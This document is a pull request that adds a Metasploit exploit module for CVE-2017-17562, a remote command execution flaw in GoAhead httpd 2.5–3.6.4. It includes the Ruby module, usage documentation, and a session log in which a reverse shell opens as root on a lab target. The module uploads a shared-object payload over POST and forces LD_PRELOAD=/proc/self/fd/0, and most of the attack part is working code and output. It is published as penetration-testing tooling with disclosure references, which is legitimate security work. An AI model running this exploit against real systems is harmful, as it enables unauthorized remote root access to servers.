### PR TITLE
GoAhead cgi exec

### DIFF
--- a/documentation/modules/exploit/linux/http/goahead_cgi_exec.md
+++ b/documentation/modules/exploit/linux/http/goahead_cgi_exec.md
@@ -1,0 +1,65 @@
+## Vulnerable Application
+
+  The GoAhead httpd server between versions 2.5 and 3.6.4 which have CGI enabled, are vulnerable to 
+  a command injection vulnerability where its possible to call and `LD_PRELOAD` on a user supplied file delivered
+  in a post request, resulting in RCE.
+
+### Kali 2017.3 and Ubuntu 16.04 Install Instructions
+
+These instructions are based on the vulerability analysis by [elttam.com.au](https://www.elttam.com.au/blog/goahead/)
+
+```
+git clone https://github.com/embedthis/goahead.git
+cd goahead/
+git checkout tags/v3.6.4 -q
+make > /dev/null
+cd test
+gcc ./cgitest.c -o cgi-bin/cgitest
+sudo ../build/linux-x64-default/bin/goahead
+```
+
+## Verification Steps
+
+  Example steps in this format (is also in the PR):
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/goahead_cgi_exec```
+  4. Do: ```set rhost [ip]```
+  5. Do: ```exploit```
+  6. You should get a shell.
+
+## Options
+
+  **CGIDIR**
+
+  The name of the CGI directory, default is `/cgi-bin/`.
+
+  **CGINAME**
+
+  The name of a valid CGI script within the CGI directory.  The default is valid for the example build shown in this doc.
+
+## Scenarios
+
+### GoAhead 3.6.4 on Ubuntu 16.04 x64
+
+```
+[*] Processing goahead.rc for ERB directives.
+resource (goahead.rc)> use exploit/linux/http/goahead_cgi_exec
+resource (goahead.rc)> set verbose true
+verbose => true
+resource (goahead.rc)> set rhost 2.2.2.2
+rhost => 2.2.2.2
+resource (goahead.rc)> check
+[*] Validating CGI is enabled against URI: /cgi-bin/qjXI7SU9fQ7oDVulCu7m5jw5qUr7jxwCXgqHxBoZ
+[*] 2.2.2.2:80 The target is not exploitable.
+resource (goahead.rc)> exploit
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Sending Exploit to /cgi-bin/cgitest
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:45762) at 2017-12-23 17:12:39 -0500
+uname -a
+Linux goahead 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
+
+whoami
+root
+```

--- a/modules/exploits/linux/http/goahead_cgi_exec.rb
+++ b/modules/exploits/linux/http/goahead_cgi_exec.rb
@@ -1,0 +1,92 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'GoAhead ld_preload Command Execution',
+      'Description'    => %q{
+        This module exploits a command execution vulnerability in GoAhead httpd
+        server from 2.5 to 3.6.4.
+        The server contains a vulnerability where ld_preload can be included in
+        a cgi-bin call, and interpreted by the server to load a .so file.
+        Only X64 payloads were verified.
+      },
+      'License'        => MSF_LICENSE,
+      'Privileged'     => true,
+      'Platform'       => 'linux',
+      'Author'         =>
+        [
+          'Daniel Hodson ', # Discovery and exploit
+          'h00die', # Discovery and exploit
+        ],
+      'References'     =>
+        [
+          ['CVE', '2017-17562'],
+          ['EDB', '43360'],
+          ['URL', 'https://www.elttam.com.au/blog/goahead/']
+        ],
+      'Targets'        =>
+        [
+          ['X64: 2.5 - 3.6.4 ', { 'Arch' => ARCH_X64 }],
+          ['X86: 2.5 - 3.6.4 ', { 'Arch' => ARCH_X86 }],
+          ['ARM (LE): 2.5 - 3.6.4 ', { 'Arch' => ARCH_ARMLE }]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Dec 18 2017'
+    ))
+
+    register_options([
+      OptString.new('CGIDIR', [true, 'CGI directory', '/cgi-bin/']),
+      OptString.new('CGINAME', [true, 'CGI file', 'cgitest']),
+    ],)
+  end
+
+  def check
+    begin
+      url = normalize_uri(datastore['CGIDIR'], Rex::Text.rand_text_alphanumeric(40))
+      vprint_status("Validating CGI is enabled against URI: #{url}")
+      res = send_request_cgi({
+        'uri'    => url,
+        'method' => 'GET',
+      }, 25)
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      vprint_error('Connection failed')
+      return Exploit::CheckCode::Unknown
+    end
+    if res and res.code == 200 and res.body =~ /CGI process file does not exist/
+      print_good('CGI is enabled, manual verification of version and valid CGI file required.')
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    print_status("Sending Exploit to #{datastore['CGIDIR']}#{datastore['CGINAME']}")
+    begin
+      res = send_request_cgi({
+        'uri'    => normalize_uri(datastore['CGIDIR'], datastore['CGINAME']),
+        'method' => 'POST',
+        # elf-so method taken from #8450
+        'data'   => Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform,
+                      payload.encoded, "elf-so", {:arch => target.arch, :platform => target.platform}),
+        'vars_get' =>
+          {
+            'LD_PRELOAD' => '/proc/self/fd/0'
+          }
+      }, 25)
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      print_error('Connection failed')
+    end
+    if res and res.code == 404
+      print_error('400 error received, verify location of cgi script')
+    end
+  end
+end

--- a/modules/exploits/linux/http/goahead_cgi_exec.rb
+++ b/modules/exploits/linux/http/goahead_cgi_exec.rb
@@ -23,8 +23,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'       => 'linux',
       'Author'         =>
         [
-          'Daniel Hodson ', # Discovery and exploit
-          'h00die', # Discovery and exploit
+          'Daniel Hodson ', # Discovery
+          'h00die', # exploit
         ],
       'References'     =>
         [
@@ -64,6 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_good('CGI is enabled, manual verification of version and valid CGI file required.')
       return Exploit::CheckCode::Detected
     else
+      print_status('Newer GoAhead server, or not vulnerable.')
       return Exploit::CheckCode::Safe
     end
   end
@@ -86,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_error('Connection failed')
     end
     if res and res.code == 404
-      print_error('400 error received, verify location of cgi script')
+      print_error('404 error received, verify location of cgi script')
     end
   end
 end


### PR DESCRIPTION
This module adds a `LD_PRELOAD` based RCE against GoAhead web server 2.5 - 3.6.4 based on @danielhodson 's amazing research and proof of concept [here](https://github.com/elttam/advisories/tree/master/CVE-2017-17562)

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/goahead_cgi_exec`
- [ ] `set rhost [ip]`
- [ ] `exploit`
- [ ] **Verify** you get a shell
- [ ] **Verify** if your CGIFILE is wrong, you get told so
- [ ] **Document** looks good.


I only verified this against x64, I included x86 and ARMLE, as the theory is sound.

@danielhodson I copied your "fingerprint" (check in msf terms), however when I copied your install, the response back I got was (summarized):
```
<title>Document Error: Not Found</title>
<h2>Access Error: Not Found</h2>
```
I can adjust the msf module code, but wanted to check with you where you were seeing the `CGI process file does not exist`.  Also, msf uses emails, so I put your name there, but couldn't find an email.  Let me know if you want one added, and if you want your name adjusted (dan vs daniel etc) or any other references added.